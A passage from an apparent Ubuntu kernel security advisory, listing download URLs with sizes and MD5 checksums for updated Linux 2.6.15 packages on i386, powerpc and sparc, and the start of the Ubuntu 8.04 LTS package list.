b0a622b932e40a7011d5e9ec9bd21eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    98468 ddb974591a687460f50c26a2e2682593\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb\n      Size/MD5:   299158 458051a07217501718f6e2a742bec0a3\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    51536 d2c7a02ac033097208c359312e95d246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2482 3c964c577c93d80cee55d06e78003951\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40906 84f84dc75718a347eb6623204cab6209\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    29892 4a807f384985ae3376d509474716f13a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    45054 a2373aac90339698b2cba11e43978565\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     1934 0887612df6acbc867949c33251427c00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     2198 d38a4ec22579275ff2f48805be734356\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   161908 70564b18529d383509cb4c1d4898425a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872596 8602056ab95806f02667587737cb3b59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb\n      Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17386 1abc2376b554610aec23e87f60998358\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    85854 59c8914383ae0624690950d8f844c101\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    60378 183583ac6a0ab738109499861a861ca2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    70420 da9263ada0b850362f022c36b6769f22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115790 ac0661102201e3f682eda1052d987671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   168082 6f375034031b861fe42ba973c9390ded\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40380 c083f0781fb33b64329d10c233affde2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   149304 958f0b630326763cddddce5503f3319d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5:   773010 979da22c264d122841ea140319b365ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb\n      Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5: 15017856 479231852577fdd0e402556287a02059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   163276 481deef18ee50e039791747737619c3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    59308 83efde441d0de3f09bb163e53016a300\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz\n      Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc\n      Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb\n      Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb\n      Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n  